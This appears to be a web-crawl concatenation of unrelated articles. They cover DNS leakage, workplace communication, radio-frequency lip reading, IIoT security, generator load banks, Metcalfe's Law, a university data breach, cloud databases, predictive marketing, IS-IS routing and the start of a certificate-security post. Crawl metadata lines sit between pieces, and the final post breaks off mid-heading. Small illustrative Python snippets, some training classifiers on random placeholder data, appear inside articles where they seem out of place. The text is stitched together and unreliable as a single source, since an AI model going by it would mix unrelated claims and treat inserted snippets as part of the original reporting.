Many organizations run DNS on the inside of the network, advertising local resources for workstations. Some smaller organizations run split-horizon DNS servers that provide DNS services both to the outside world and to the internal network. A wrong configuration on that DNS server can lead to some devastating DNS data leakages as internal names and addresses are shared with attackers.
The easily spoofed protocol UDP that DNS uses is a weak link. An attacker inline between the victim and the DNS server they’re querying can intercept and monkey with DNS queries. It’s a pretty easy attack to pull off if you’re on the same wire or wireless as the victim or DNS server. An F5 researcher found a way to use it to steal Microsoft Outlook credentials. So, it’s an attack that shouldn’t be taken lightly.
Bottom line: We are stuck with DNS, so better make sure it’s reliable and incorruptible. The future of the Internet depends on it.
Communication can be a real challenge; working across cultures, backgrounds, experiences, and perspectives can result in different interpretations — and this is under the best of circumstances. However, when it’s written communication, the challenge is multiplied due to the lack of feedback cues from facial expressions, body language, and the like. These challenges make it exceedingly easy to create a situation where what a person hears is entirely different from what the speaker (or writer) intended.
These disconnects can create many negative impacts and make productive communication impossible. When communicating as a professional, there are a number of things to keep in mind, a few of which I’ve collected here.
What you intend is effectively irrelevant when communicating with others; it’s their perception that matters, as that’s what they will act on. For example, you may intend to be supportive, and it could instead be seen as patronizing. You may intend to say something that spurs conversation and instead shut it down. Perhaps you intend to take a strong position on something you care about, but in the process, you come across as a bully. These perceptual mismatches are all too easy to create through less than ideal communication, and, likely, we’ve all confused our listeners many times by making mistakes like these. When a person reacts to your communication, they can only infer your intent - and it can be drastically different than your actual intent.
Just because the intent was good doesn’t mean that the result will be; philosophy has an entire school of thought about this, consequentialism. In consequentialism, one’s intent isn’t considered when determining if an act (or lack of action) is right or wrong. Only the result it produces is considered. If you do something with the honest intention to do good, but it works out to cause more harm than good, then the action was wrong. While consequentialism is about morals, it also works for communication. How a person perceives what you have to say matters, not the intent in your mind while saying it.
With so much that can go wrong, we must be diligent in placing ourselves in the recipient’s shoes — try to do our best to see how something would be perceived, and adjust as needed to minimize the risk of them coming away with a different meaning. Of course, it’s impossible to get this correct 100% of the time, but it is possible to try 100% of the time.
Words have meanings, often more than one, and sometimes different meanings to different groups. What may seem innocent to one group, may be insulting or demeaning to another. What may be a minor expression of opinion to one, maybe inflammatory or aggressive to another. Thus, our choice of words is critical to ensuring that our communications achieve our intent, instead of leaving the meaning up to the ambiguity of inference, or worse, creating a perception entirely at odds with the original purpose.
The use of inflammatory terminology, calling an entity evil, for example, can send discourse into dangerous territory and lead to people feeling attacked or bullied. It can lead to shutting down a conversation or leave it spiraling out of control, becoming ever more problematic. If you find yourself using any of the following, you should likely reconsider your word choice.
- Always, Never, Everyone, No-one, Best, Worst - This is a sign of oversimplification and generalization.
- Overstatements & Exaggerations - Statements should be fact-based, clear, and accurate.
- Extreme Words - The use of words that evoke extremes (evil, obnoxious, devil, etc.) set the stage for hostility and degradation of discourse.
- Name Calling - While one wouldn’t generally do this in a professional context, it happens more often than it should, especially when referring to external entities. This is another dangerous territory, and can have particularly harmful effects even when the target isn’t part of the conversation.
- Implications - It is easy to make assumptions about the feelings and positions of the recipient, and imply certain things without directly stating them. This can lead to varying understandings, and even outright wrong interpretations when those assumptions are incorrect.
- Omissions - By omitting details, such as other facts, different opinions, mitigating factors, and the like, it’s possible to create an inaccurate view, and create a variety of interpretations among those with portions of the missing information.
- Facts vs. Opinions - There are places and times that opinions are perfectly appropriate, but they need to be expressed as what they are, opinions. Care should be taken to avoid a listener (or reader) confusing opinion for fact. This is particularly important for professional opinions versus personal opinions; my personal opinion of something may be quite different from my professional opinion of the same thing. Professional opinions are held to a higher standard and are more influential; as such, it’s vital that they not be mixed.
Sexist language, racist, homophobic, transphobic, and so many other categories should be avoided at all costs, even when quoting another source. There are many types of exclusionary and offensive language, all of which are harmful regardless of who the intended target is, or if the intended target ever hears it. Generally speaking, if you have to ask if it could be offensive, it’s best to look for other options (or completely reevaluate what you are saying).
As the speaker, the onus is on you to understand what a statement means and how different people could understand it. At times, people will use a term that they believe to be innocent, but is problematic. While the intent isn’t to offend, it doesn’t make the use of such a term less offensive. This requires a conscious effort to understand different groups and how they use terminology, soliciting and listening to feedback. A constant process of education to ensure that your understanding of a term is accurate and not offensive.
This requires self-awareness, sensitivity to others, and the willingness to invest in being a better and more effective communicator. Not everyone does this naturally; for some, this is a more significant and more conscious effort, though it’s an effort that is necessary.
Given that perception is the reality to the listener, it’s imperative to make this investment and clearly understand every word and its various meanings.
Professional and respectful discourse should be encouraged; this means being open to contrary views, opinions, and perspectives. Unfortunately, it’s all too easy to shut down a conversation through poorly considered communication, leaving others involved with no desire to continuing to engage. Even worse, it can create an environment where ideas and opinions are withheld out of fear of the response. When the door for respectful and honest communication is closed, it comes at a cost — great ideas that are never considered, new perspectives that go unheard, useful information goes unshared, and the potential for adversarial relationships to develop.
There’s no expectation for everyone to always agree, but everyone deserves to be heard, and have their thoughts and ideas fairly considered. This is impossible when they are reluctant to share them because of poor and ineffective communication styles. Progress isn’t made when ideas are suppressed; success isn’t achieved when thoughts are held up by fear.
Discourse should be open, honest, and respectful. Anything less than this is an error that should be addressed as quickly as possible, lest a culture of fear and isolation develop.
Every person, regardless of innate trait or choice, deserves to be treated with respect, deserves to be heard, deserves to work without fear, or degradation, or condescension, or a thousand other things that place barriers, restrictions, limits, or otherwise hold them back from being their best. There’s never a valid reason for being disrespectful in professional communication or a professional environment (or, frankly, in any communication or environment).
Think about how the people you are communicating with will feel, what they will think, how your words will impact them. Try to understand the world from their perspective and consider your words in that light; this can often expose issues that would otherwise be missed; empathy is crucial to good communication. Coming to a conversation from a point of empathy allows you to understand issues and challenges easier, will enable you to find better solutions, and more quickly come to a shared understanding. If you engage without empathy, without understanding the other parties, you are not only working with woefully incomplete information, you are allowing your own biases and opinions to color the discussion. This likely means you are missing crucial points that could be addressed if you were working with a better understanding, and more open to their perspective.
It is your duty, no matter your role, to treat everyone with respect, including hearing them (not just letting them speak) and engaging in a good-faith manner. Nothing less than that should be accepted.
Allowing a person to speak is a simple and inactive task; hearing them, on the other hand, is an active task that requires several things:
- Paying attention to what they are saying and how.
- Understanding their perspective, challenges, and issues.
- Setting aside your biases and preconceived notions so that you can empathize and actually understand them.
- Reserving judgement until you are fully informed, instead of making decisions or forming positions based on incomplete information.
If you don’t make an effort to actually hear a person, you are doing them and everyone else a disservice, and you are not truly engaged; if you are in a conversation just to support your own views and opinions, you are almost certainly speaking without adequate insight to form a meaningful position. Thus, you’re doing more harm than good. While you may still come to a position that disagrees with others you are communicating with, this position should be born of careful consideration of all relevant information, not just the information you came into it with.
Take time to think about what you say, how others will feel, and you’ll be able to engage at a more meaningful level. This does require effort, but it’s a worthy investment, and you owe it to those you work with. These more meaningful conversations lead to better results, better ideas, better solutions, better relationships, and a better environment.
Everyone deserves respect, and it should be demonstrated in how you communicate.
A new system capable of reading lips with exceptional accuracy, even when speakers are wearing face masks, could help create a new generation of hearing aids.
An international team of engineers and computing scientists developed the technology, which pairs radio-frequency sensing with artificial intelligence for the first time to identify lip movements.
The system, when integrated with conventional hearing aid technology, could help tackle the “cocktail party effect,” a common shortcoming of traditional hearing aids.
Currently, hearing aids assist hearing-impaired people by amplifying all ambient sounds around them, which can be helpful in many aspects of everyday life.
However, in noisy situations such as cocktail parties, hearing aids’ broad spectrum of amplification can make it difficult for users to focus on particular sounds, like a conversation with a specific person.
One potential solution to the cocktail party effect is to make “smart” hearing aids, which combine conventional audio amplification with a second device to collect additional data for improved performance.
While other researchers have had success in using cameras to assist with lip reading, collecting video footage of people without their explicit consent raises concerns for individual privacy. Cameras are also unable to read lips through masks, an everyday challenge for people who wear face coverings for cultural or religious reasons and a broader issue in the age of COVID-19.
The University of Glasgow-led team outlined how they set out to harness cutting-edge sensing technology to read lips. Their system preserves privacy by collecting only radio-frequency data, with no accompanying video footage.
To develop the system, the researchers asked male and female volunteers to repeat the five vowel sounds (A, E, I, O, and U), first while unmasked and then while wearing a surgical mask.
As the volunteers repeated the vowel sounds, their faces were scanned using radio-frequency signals from both a dedicated radar sensor and a Wi-Fi transmitter. Their faces were also scanned while their lips remained still.
Then, the 3,600 samples of data collected during the scans were used to “teach” machine learning and deep learning algorithms how to recognize the characteristic lip and mouth movements associated with each vowel sound.
Because the radio-frequency signals pass easily through the volunteers’ masks, the algorithms could also learn to read masked users’ vowel formation.
The system proved capable of accurately reading the volunteers’ lips most of the time. Wi-Fi data was correctly interpreted by the learning algorithms up to 95% of the time for unmasked lips, and up to 80% for masked lips. Meanwhile, the radar data was interpreted correctly up to 91% of the time without a mask, and 83% of the time with a mask.
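As a rough illustration of the classification step, the sketch below trains a generic off-the-shelf classifier on placeholder data. It assumes the radio-frequency scans have already been reduced to fixed-length feature vectors with one vowel label per sample; the feature extraction and the team's actual models are not reproduced here.

```python
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score

# Placeholder data: 3,600 samples of 128 RF-derived features each,
# labelled with one of the five vowels (0=A, 1=E, 2=I, 3=O, 4=U).
rng = np.random.default_rng(0)
X = rng.normal(size=(3600, 128))
y = rng.integers(0, 5, size=3600)

X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)

clf = RandomForestClassifier(n_estimators=200, random_state=0)
clf.fit(X_train, y_train)

print("Accuracy:", accuracy_score(y_test, clf.predict(X_test)))
```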
Dr. Qammer Abbasi, of the University of Glasgow’s James Watt School of Engineering, is the paper’s lead author. He said, “Around 5% of the world’s population—about 430 million people—have some form of hearing impairment.
“Hearing aids have provided transformative benefits for many hearing-impaired people. A new generation of technology that collects a wide spectrum of data to enhance and augment the amplification of sound could be another major step in improving hearing-impaired people’s quality of life.
“With this research, we have shown that radio-frequency signals can be used to accurately read vowel sounds on people’s lips, even when their mouths are covered. While the results of lip-reading with radar signals are slightly more accurate, the Wi-Fi signals also demonstrated impressive accuracy.
“Given the ubiquity and affordability of Wi-Fi technologies, the results are highly encouraging, suggesting that this technique has value both as a standalone technology and as a component in future multimodal hearing aids.”
Professor Muhammad Imran, head of the University of Glasgow’s Communications, Sensing and Imaging research group and a co-author of the paper, added, “This technology is an outcome of two research projects funded by the Engineering and Physical Sciences Research Council (EPSRC), called COG-MHEAR and QUEST.
“Both aim to find new methods of creating the next generation of healthcare devices, and this development will play a major role in supporting that goal.”
Cybersecurity poses a serious threat to the Industrial Internet of Things (IIoT) enabled devices and robotic automation equipment. Attackers who gain access to industrial networks have a number of devastating options available to them, from changing production data to causing harmful production errors.
Cybersecurity in the robotics field is still immature, but manufacturers are starting to realize the vulnerability that connected robots and automation equipment creates in their operations. For those seeking to beef up their cybersecurity and protect their business, there are a number of options available to them.
When it comes to cybersecurity, there’s no single “fence” that can be placed around all systems for full protection. Over the years, attackers have found ways to get around these barriers and will continue to do so. A hallmark of cybersecurity best practice lies in creating depth in IIoT architecture to discourage attacks.
Essentially, creating multilayered and multidimensional IIoT architectures means that attackers would have to break through many different levels in order to access anything of value. The time and difficulty of doing so is the primary deterrent – breaking into a deeply layered system is incredibly complex.
Companies also should be building cybersecurity protocols into each layer of the IIoT architecture for greater protection. For example, there are many components to a robotic system that could be protected for a defense-in-depth strategy. There’s the embedded operating system within the robot, as well as the application code that runs on the robot. There’s a wealth of communications code that processes commands to the robot. The robot will likely be connected to various PC-based systems, which may or may not have databases on them, including cloud servers or software that communicates to the robots and users over a web interface.
IIoT architectures such as the one described above may already be complex in nature, but they still need protection at every layer of the system.
Cybersecurity standards for robotic automation
There are a number of standards, recently developed by the International Electrotechnical Commission (IEC) and the International Society of Automation (ISA), that govern security for Industrial Automation and Control Systems (IACS).
In particular, the ISA/IEC 62443 standard contains seven foundational requirements for cybersecurity in modern production environments. These seven tenets cover:
- Identification and authentication control
- Use control
- System integrity
- Data confidentiality
- Restricted data flow
- Timely response to events
- Resource availability
Cybersecurity is a real threat today. The potential impact of a successful attack can be devastating. Robot suppliers and manufacturers alike have to be vigilant and prepared. All IIoT and automation equipment must take cybersecurity into account.
This article originally appeared on the Robotics Online Blog. Robotic Industries Association (RIA) is a part of the Association for Advancing Automation (A3), a CFE Media content partner. Edited by Chris Vavra, production editor, Control Engineering, CFE Media.
Have the details from your generator nameplate or data tag at the ready.
To specify the right equipment for the job, your chosen supplier is likely to ask you for the capacity rating of the generator you wish to test. This information can be found on the nameplate (or data tag) on the generator itself. The capacity rating will be specified in KVA and kW at a specified power factor and maximum output voltage.
The primary difference between kW (kilowatt) and kVA (kilovolt-ampere) is the power factor. kW is the unit of real power, while kVA is the unit of apparent power (the combination of real and reactive power). The power factor, unless it is defined and known, is therefore an approximate value (typically 0.8), and the kVA value will always be higher than the value for kW.
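A quick worked example of the relationship, using the commonly assumed 0.8 power factor and a hypothetical nameplate rating:

```python
# Real power (kW) = apparent power (kVA) x power factor
kva_rating = 500          # from the nameplate (example value)
power_factor = 0.8        # typical assumed value when not stated

kw_rating = kva_rating * power_factor
print(f"{kva_rating} kVA at PF {power_factor} -> {kw_rating:.0f} kW")  # 400 kW
```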
The nameplate will also have information on the voltage, operating phases and configuration of your generator, all of which will impact the load bank your supplier will specify. Having a photo of the nameplate on your mobile phone will mean you have all the information to hand when talking to your supplier.
In the early years of networking, Bob Metcalfe set forth his famous law of networking that points out that the total value of a network grows by the square of the number of nodes (people or devices) that connect to it.
As time went on, networks grew, the dot-com world worked itself into a frothing frenzy, and Metcalfe’s Law seemed to promise utopia. Armed with hindsight, which is inherently unfair, the issue with any network value statement is that the potential value of a network increases at an unknown rate for each node added and, even if there is real value, the potential may not be realized either for the node or the overall network.
Additional nodes and networks added to an existing network do not necessarily guarantee value – positive or negative. A node could be silent, could steal value through malicious behavior, or could be served by multiple networks, in which case there are multiple logical addresses for only one physical device or service, causing redundancy and the potential for overstatement in the real world.
Looking at the potential value of networks is interesting but an exact answer about value is impossible – only guesstimates are possible for a variety of reasons. The intent of this article is to spend a few minutes and examine the potential value of networks.
If you can bear with some math for just a moment, Metcalfe’s Law promised that the value of a network was n^2 - n, where “n” is the number of nodes. In the late 1990s, David Reed suggested the value was really 2^n. In 2005, Andrew Odlyzko and Benjamin Tilly suggested a formula of n log(n) because they viewed the previous two formulas as overstating value. Now, with reality setting in, we can look at these formulas through a different lens.
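Plugging a few node counts into the three formulas shows how quickly the estimates diverge; note that these are counts of potential connections or groupings, not realized value.

```python
import math

def metcalfe(n):    # n^2 - n: pairwise connections
    return n**2 - n

def reed(n):        # 2^n: possible subgroups
    return 2**n

def odlyzko(n):     # n * log(n): a more conservative estimate
    return n * math.log(n)

for n in (10, 100, 1000):
    print(f"n={n:>5}  Metcalfe={metcalfe(n):>12,}  Reed=2^{n}  Odlyzko={odlyzko(n):,.0f}")
```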
First, connections, value, price, and cost are four fundamentally different concepts. Connections address how many different ways nodes can be connected – paths if you will.
Value is something that is assigned by a buyer of a good or service. It is subjective and fluctuates with time and the whims of the market.
Costs are outlays, both in economic and accounting terms, associated with running a business/organization and providing products and services. Lastly, price is the amount a product or service is offered for sale at and, like value, it will fluctuate with the market.
Despite the rhetoric, there simply isn’t a direct correlation between nodes and value. There are too many real-world variables that enter in to accurately estimate value.
When we look at the network value formulas, we are not truly seeing value, price or cost – only potential connections. If we have 2^32 connections and all lack value, then the value of the total network is still only zero, but the potential could hold promise over a relatively smaller network of 2^16 connections given that all nodes have positive value.
Therein lies the first issue – value is cumulative. One high-value node can be far more worthwhile than several other nodes combined and a small network with relatively high-value nodes can be cumulatively worth more than a larger network of relatively lower-value nodes.
For that matter, we can safely assume that for any network, only 20% of the nodes will create 80% of the value. Conversely, we can also assume that the majority, or 80%, of the nodes will contribute very little value – perhaps 20%, if the 80/20 rule holds true.
While possible connections and potential values are interesting to contemplate, any formula aimed at ascertaining theoretical network potential value (NPV) can only go so far in the real world due to factors that impair incremental value or even create negative value for each additional node added.
This latter part is very concerning because of the possibility that some or all of the total value created could be destroyed, following something like a logistic growth curve that reaches an asymptotic peak with diminishing returns; but as the threats overwhelm the value, the tail end of the curve begins to fall at a rapid rate.
Thinking ahead, the challenge that we must come to grips with as a society is that any hope of attaining the NPV of the Internet, the largest digital network on the planet, necessitates a degree of globally coordinated care that has not been evidenced to date.
Other than the opportunity to learn and grow, if there’s one expectation placed on universities and colleges, it’s safety. Students, staff, and parents want to feel secure on campus and protected from physical and emotional harm.
Unfortunately, cybersecurity is becoming a growing source of insecurity at educational institutions across the nation.
What you need to know about the Georgia Tech breach
Recently, the Georgia Institute of Technology, commonly referred to as “Georgia Tech,” announced an investigation into what appears to be a massive data breach. As many as 1.3 million people, including past and current students, applicants, and staff, may be affected.
Last month, the school discovered a hack that may have exposed victims’ Social Security numbers and other personally identifiable information.
In the Cyber Security Notification posted on the university’s website, the college revealed:
“The information illegally accessed by an unknown outside entity was located on a central database. Georgia Tech’s cybersecurity team is conducting a thorough forensic investigation to determine precisely what information was extracted from the system, which may include names, addresses, Social Security numbers, and even birth dates.”
Breaches on the rise in the education industry
This marks the second data breach at the school in less than a year. Last July, Georgia Tech mistakenly emailed personal information for nearly 8,000 students to other students. Social Security numbers were not exposed in the first breach, but other personal information — including birth dates, phone numbers, and grade-point averages — was compromised.
Georgia Tech is far from alone.
Higher education institutions have come increasingly under attack in the past few years. Incidents were up by more than 100 percent in 2017, compared to 2016. And it’s not just large campuses.
Three private colleges — Oberlin, in Ohio; Grinnell, in Iowa; and Hamilton, in New York — all had their applicant databases hacked, according to a recent article in the Washington Post. That same week, a second report documented attacks on more than two dozen universities in the U.S. and elsewhere in an alleged attempt to steal military-related research.
Why the sudden upsurge in attacks?
Large-scale data breaches have hit a variety of large companies and institutions, including healthcare systems and financial firms. Why have colleges and universities become the next target of choice? More importantly, what steps can these organizations take to protect their employees?
A target-rich environment
The type of personal data stolen in the Georgia Tech case is gold on the dark web. Educational institutions typically request and store sensitive financial data and personally identifiable information like Social Security numbers and addresses for both students and their parents.
Cybercriminals can easily sell the information to identity thieves who open new lines of credit and financial accounts, drain existing bank accounts, and conduct other criminal acts. Further, the compromised data is often used to blackmail victims.
Who’s protecting the data?
Hacking into an individual server, even one housed at a tech-savvy institution, long ago became routine. That’s why cloud-based data storage seemed ideal for protecting sensitive information.
However, even if the third party hosting the data follows proper cybersecurity protocols, there is one variable they can’t control: human error. In fact, this is actually the number one cause of data breaches.
How can educational institutions protect their employees?
While identity thieves, hackers, and cybercriminals are targeting educational organizations in record numbers, there are steps universities can take to protect their employees.
If you’re a broker with clients in the education industry, you might start by reading our complimentary one-sheet, “How Identity Theft and Data Breaches Affect the Education Industry.” It’s loaded with important information you can use when speaking with clients about the risks of today’s digital era and arming them with the knowledge they need to protect their employees.
Are you an employer in the education industry? Consider reading our downloadable guide, “HR Guide to Employee Data Protection and Identity Theft Prevention.” It includes a number of tools and resources you can use to keep your employees safe. Need further assistance? That’s why we’re here. Feel free to contact us today.
The digital transformation of recent years has brought about a drastic change in handling and storing data. That's of a business and personal nature alike. Organizations worldwide are dealing with more data than ever before, and there's a pressing need for database solutions that are flexible, practical, and (perhaps most importantly of all) reliably secure.
A huge range of technologies are making effective use of the cloud and transforming how we all do business in the process. Just a couple of decades ago, who'd have thought that online meetings would be the ‘new normal’ for organizations across every sector of the business world? Yet thanks to the cloud and a VoIP service, it’s never been easier to reach out to colleagues and clients around the globe. And in what feels like no time at all, it’s become an everyday part of doing business.
Of late, many people have been asking just what cloud-native means for the technological infrastructure. Cloud-native technologies, including databases, have become increasingly commonplace. But what are cloud-native databases, and what exactly are their advantages?
Cloud-native databases: what are they?
In short, cloud-native databases are - as the name suggests - databases that are primarily cloud-based. As such, their deployment and delivery to clients are conducted via the cloud. They are designed to make the most effective use of cloud computing technology and the opportunities it provides. Most databases can be run using the cloud, but there are several things to consider first. Those include the purposes for which the database is required (i.e., what will be stored on it), its technological architecture, and the costs involved.
So, for example, you might think you have one of the best telemedicine platforms in the business. Without an adequate database system to back it up, though, you won't be able to deliver the goods effectively. Consider identifying and managing long-term conditions, or understanding the role of lifestyle factors in causing or exacerbating illnesses - both processes that benefit from effective analysis of large data sets. Effective customer support is similarly dependent on having robust databases in place.
Cloud-native databases are delivered through a platform as a service (PaaS) model, which makes managing and extracting data - as well as storing it - quite simple. These databases are set up by installing database software on top of a cloud infrastructure, and they can be used for data storage, management, and extraction. Unlike most traditional databases, cloud-native databases can provide direct access and run-time scalability, which allows for enhanced flexibility and elasticity. Now let’s look more closely at the advantages of choosing cloud-native databases.
Why choose cloud-native databases?
We’ve just touched on the fact that cloud-native databases can provide firms with improved elasticity. This is an important matter. For the uninitiated, elasticity is about how a system adapts to changing workload volumes by allocating resources according to the demand at any given time. The point is to maintain an appropriate balance of resource provision, avoiding both over-resourcing and under-resourcing. Through more efficient resource matching, cloud-native databases can deliver significant cost savings.
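To make elasticity concrete, here is a minimal sketch of the kind of scaling rule a cloud-native database service might apply behind the scenes. The thresholds, replica limits and function name are illustrative assumptions, not any particular vendor's behaviour.

```python
# Illustrative autoscaling rule: match provisioned capacity to demand.
# Thresholds and replica limits are assumptions for the sake of the example.

def desired_replicas(current_replicas: int, cpu_utilization: float,
                     min_replicas: int = 1, max_replicas: int = 16) -> int:
    """Scale out when the cluster is busy, scale in when it is idle."""
    if cpu_utilization > 0.75:          # over-utilised: add capacity
        target = current_replicas + 1
    elif cpu_utilization < 0.25:        # under-utilised: release capacity
        target = current_replicas - 1
    else:                               # balanced: keep resources as they are
        target = current_replicas
    return max(min_replicas, min(max_replicas, target))

print(desired_replicas(current_replicas=4, cpu_utilization=0.82))  # -> 5
print(desired_replicas(current_replicas=4, cpu_utilization=0.10))  # -> 3
```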
That’s not the only reason to choose a cloud-native database, however. There are many other advantages to doing so, including enhanced scalability and accessibility. Organizations that are ambitious about their growth targets - and serious about meeting them - need to be able to scale up quickly and responsively. They also need to have a database that can be accessed at any time and from anywhere. Cloud-native databases provide this kind of responsiveness and easy remote accessibility. They also offer storage that isn’t hampered by the constraints associated with traditional database solutions.
Of course, it goes without saying that ensuring data and network security is of the utmost importance for any organization. From HR software to customer privacy, businesses must ensure that they have robust measures in place to keep sensitive data out of the hands of hackers. Cloud-native databases are safeguarded by strong firewalls and anti-virus protection. They’re also subject to regular software updates (taking account of ongoing security threats) and stringent monitoring.
Geographic resilience is another crucial advantage of cloud-native databases. Using their clustering capacity, they can respond to changes in the network and readjust themselves. Automated cloud-native databases can detect regional usage patterns and deliver relevant data to users rapidly, boosting performance. This automation also translates into low upfront costs and more efficient deployment of the human resources needed to manage databases. Combined, that can deliver sizable savings for customers.
Predictive Data Analytics is the process of using historical and current data combined with machine learning to forecast certain outcomes. In the marketing world, predictive analytics uses monitoring and reporting to accurately plan strategies and campaigns. For nearly a decade, this type of marketing research has been changing the landscape of how organisations reach and impact their audiences.
Find better leads
Using the historical data of both a certain company and the industry a company is in, certain factors pertaining to sales leads can be found using Predictive Analytics. For instance, a financial advisory firm may find that individuals between the ages of 52 and 58 who exhibit certain behaviours on social media are significantly more likely to become clients.
Such indicators can be used in a number of ways including:
- Ad targeting
- Suggestive copywriting
- Lead prospecting
- Targeted sales conversations
Identify prospects faster
Many companies use customer relationship management (CRM) software. These tools typically include a way to score leads. Scoring is simply a numbering system that alerts the marketing and sales teams when a lead is close to making a decision. When this data is combined with machine learning and artificial intelligence, identifying sales-qualified leads becomes easier over time. Moreover, predictive analytics can be used to shorten the sales cycle by better predicting a lead's behaviour in the funnel.
When the process of identifying sales-qualified leads (SQLs) is done manually, there are many mistakes that can occur. For instance, if a lead downloads a certain resource it could trigger the marketing team to send that lead to sales. However, predictive analytics may tell you that a lead may have downloaded it too quickly and is not ready for a sales conversation.
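As a rough illustration of how machine learning can drive lead scoring, the sketch below fits a simple logistic-regression model to historical lead outcomes and scores a new lead. The feature set and data are hypothetical, and a real CRM integration would obviously use far more history.

```python
# Minimal lead-scoring sketch using scikit-learn (hypothetical features and data).
from sklearn.linear_model import LogisticRegression

# Each row: [pages_viewed, emails_opened, downloads, days_in_funnel]
X = [[12, 5, 2, 30], [3, 1, 0, 4], [20, 9, 4, 60], [1, 0, 0, 2], [8, 4, 1, 21], [2, 0, 0, 9]]
y = [1, 0, 1, 0, 1, 0]  # 1 = became a customer, 0 = did not

model = LogisticRegression().fit(X, y)

# Score a new lead: probability of converting, usable as a CRM lead score.
new_lead = [[10, 3, 1, 14]]
score = model.predict_proba(new_lead)[0][1]
print(f"Lead score: {score:.2f}")  # e.g. route to sales only above a threshold
```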
Better align sales and marketing
Try as they might to understand one another, the marketing team and sales team have very different roles. More often than not, this results in a breakdown in communication that can cost a company revenue. The nature of predictive analytics is to improve over time. Data from both the sales and marketing team can improve multiple factors including:
- Handing off leads
- Communication of promotions (e.g. discounts)
- CRM implementation and updating
- Quality of leads in the funnel
Understand current customers
Many organisations rely on customer retention and add-on sales over the course of time. Retail banks, software-as-a-service companies, financial advisors and many others rely on customers sticking around for a long time. Predictive analytics helps to understand not only leads and new customers, but also the behaviours of existing clients. These factors influence marketing in a number of ways.
- Lead Generation: Certain leads may be easier to close than others. However, if those prospects end up leaving before they become profitable it won’t matter. By understanding the behaviours and attributes of clients, you can better target your lead generation efforts and acquire better long-term customers.
- New Products/Services: Predictive analytics can listen to your current client base. The data collected can be used to improve current products or even create new offers tailored specifically to predicted needs.
- Improve Referrals: Asking for referrals is an important part of any company’s lead generation. However, timing is often unpredictable. With past behaviour and predictive analytics, you can understand exactly when a customer is ready to refer you.
Perhaps one of the most impactful ways predictive analytics will reshape the marketing world will be through automation. Once the behaviours of lucrative prospects are identified, sophisticated programs can interact with leads almost immediately.
Here are a few examples:
- A lead, who fits your buyer profile, tweets a keyword pertaining to your business. A software program automatically engages with that tweet from your Twitter account.
- A prospect comes to your website through organic search and your webpage offers a resource tailored to that specific user based upon their search criteria.
- Current leads in the funnel are monitored for social activity pertaining to your industry. Once certain behaviours occur your sales team is notified.
Better budget allocation
Improved understanding of who your buyers are, where you can find them and the resources to use to garner interest can all dramatically decrease ad spend waste. Over time, predictive analytics can alert the marketing team to platforms (i.e., Facebook, AdWords) that are less effective as well as methods (i.e., video, cold email) that are not as likely to work. Conversely, the same predictions can be used to increase spending where efforts are likely to achieve the desired results.
Predictive data analytics is quickly becoming the driving force behind modern marketing. From drastically improving lead qualification to better aligning sales and marketing initiatives and making targeted marketing automation more in-tune with customers’ needs in-the-moment, predictive data analytics amplifies the ability to cater to individual customers – and that’s the magic formula for success in the modern marketing landscape.
Taj Nota, VP Professional Services UK, NGDATA (opens in new tab)
Image source: Shutterstock/ESB Professional | <urn:uuid:8a3419dd-0c01-4143-93d4-06b0a1c04e9e> | CC-MAIN-2022-40 | https://www.itproportal.com/features/six-ways-predictive-data-analytics-are-reshaping-marketing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335365.63/warc/CC-MAIN-20220929194230-20220929224230-00193.warc.gz | en | 0.935495 | 1,026 | 2.828125 | 3 |
In this chapter, you learned the basics of the OSI protocols and the IS-IS and Integrated IS-IS routing protocols. You also learned how to configure and troubleshoot Integrated IS-IS for IP on a Cisco router.
An IS is a router. A domain is any portion of an OSI network that is under a common administrative authority. Within any OSI domain, one or more areas can be defined. An area is a logical entity; it is formed by a set of contiguous routers and the data links that connect them. All routers in the same area exchange information about all the hosts that they can reach. The areas are connected to form a backbone. All routers on the backbone know how to reach all areas.
IS-IS is the dynamic link-state routing protocol for the OSI protocol stack. As such, it distributes routing information for routing CLNP data for the ISO CLNS environment.
Integrated IS-IS is an implementation of the IS-IS protocol for routing multiple network protocols; it is an extended version of IS-IS for mixed ISO CLNS and IP environments, or for IP only.
OSI network layer addressing is implemented with NSAP addresses that identify any system in the OSI network. If the NSEL field of the NSAP is 00, the NSAP refers to the device itself - that is, it is the equivalent of the Layer 3 OSI address of that device. This address with the NSEL set to 00 is known as the NET. The NET is used by routers to identify themselves in the LSPs and, therefore, forms the basis for the OSI routing calculation. (The NET is a similar concept to the router identifier used by OSPF.)
Every IS-IS router requires an OSI address even if it is routing only IP. IS-IS uses the OSI address in the LSPs to identify the router, build the topology table, and build the underlying IS-IS routing tree.
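As a small illustration of how a NET breaks down, the sketch below splits a typical NET string into its area ID, system ID and NSEL fields. The example address is made up, and real deployments follow whatever area-numbering plan the organization has chosen.

```python
# Parse an OSI NET (an NSAP with NSEL = 00) into its component fields.
# Example NET: 49.0001.1921.6800.1001.00
#   - area ID:   49.0001        (AFI 49 = private addressing, plus the area number)
#   - system ID: 1921.6800.1001 (6 bytes, often derived from an IP or MAC address)
#   - NSEL:      00             (identifies the device itself)

def parse_net(net: str) -> dict:
    parts = net.split(".")
    nsel = parts[-1]
    if nsel != "00":
        raise ValueError("A NET must end with NSEL 00")
    system_id = ".".join(parts[-4:-1])
    area_id = ".".join(parts[:-4])
    return {"area_id": area_id, "system_id": system_id, "nsel": nsel}

print(parse_net("49.0001.1921.6800.1001.00"))
# {'area_id': '49.0001', 'system_id': '1921.6800.1001', 'nsel': '00'}
```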
It is important to note that IP information takes no part in the calculation of the SPF tree - it is simply information about leaf connections to the tree.
Troubleshooting Integrated IS-IS, even in an IP-only world, requires some investigation of CLNS data. For example, the IS-IS neighbor relationships are established over OSI, not over IP. | <urn:uuid:06686995-9fde-4c88-b5dc-bd95627c9954> | CC-MAIN-2022-40 | https://www.ciscopress.com/articles/article.asp?p=31572&seqNum=6 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00193.warc.gz | en | 0.918432 | 482 | 3.734375 | 4 |
This post was originally published on the CA Security Council blog.
Looking Back at 2014
End of 1024-bit Security
In 2014, the SSL industry moved to issuing a minimum security of 2048-bit RSA certificates. Keys smaller than 2048 are no longer allowed in server certificates. In addition, Microsoft and Mozilla started to remove 1024-bit roots from their certificate stores. Hopefully, the key size change will support users through to 2030.
Push to Perfect Forward Secrecy
